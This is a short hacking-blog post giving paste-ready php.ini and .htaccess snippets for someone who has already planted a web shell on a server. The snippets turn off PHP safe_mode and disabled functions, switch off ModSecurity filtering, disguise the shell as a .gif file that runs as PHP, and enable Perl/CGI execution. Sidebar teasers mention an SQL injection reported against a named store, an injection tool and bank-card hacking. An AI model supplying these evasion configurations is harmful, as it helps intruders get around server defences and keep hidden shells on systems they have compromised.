Bypassing Shell Security

Home / Hacking, News, Security / Bypassing Shell Security

October 28, 2008 PlanetCreator 0 Comments 0 tags

Safemode = On (Secure)
Disables Functions =
dl, passthru, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid
================

Create A File “Php.ini” In Some Writeable Folder (777) Then Upload And Open Your Shell From There
———————
Paste This
———————
safe_mode = OFF
disable_functions = NONE
———————

================
ModSecurity = On
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload And Open Your Shell From There
————————
Paste This
————————
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
————————

================
Hiding Your Shell
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload Your Shell There
But Change File Extension To .gif (You Can Use Any Other extension But Change .gif In .htaccess To Extension You Chose) Then Open Your Shell From There
————————
Paste This
————————
AddType application/x-httpd-php .gif
————————

================
Activate Perl And CGI
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload Your Shell There
————————
Paste This
————————
Options ExecCGI
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
————————

Explore More

SQLi vulnerabiltiy in irrawaddy store owned by Irrawaddy Publishing Group.

PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical SQL Injection (vulnerability) on http://www.irrawaddystore.com owned by Irrawaddy Publishing Group. These are some information from Vulneral Site http://www.irrawaddystore.com :

Safe3 SQL Injector v5.1

Safe3 SQL Injector is one of the most powerful penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers.

Hacking Banking

Here is process for hacking online banking and credit cards transactions and also a process to prevent from them . The Scenario You go to a coffee shop for a

[remote] Vite 6.2.2 - Arbitrary File Read
on April 3, 2025 at 12:00 am
Vite 6.2.2 - Arbitrary File Read
[webapps] Nagios Log Server 2024R1.3.1 - Stored XSS
on April 3, 2025 at 12:00 am
Nagios Log Server 2024R1.3.1 - Stored XSS
[remote] Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
on April 3, 2025 at 12:00 am
Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
[webapps] ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
on April 3, 2025 at 12:00 am
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
[webapps] Webmin Usermin 2.100 - Username Enumeration
on April 3, 2025 at 12:00 am
Webmin Usermin 2.100 - Username Enumeration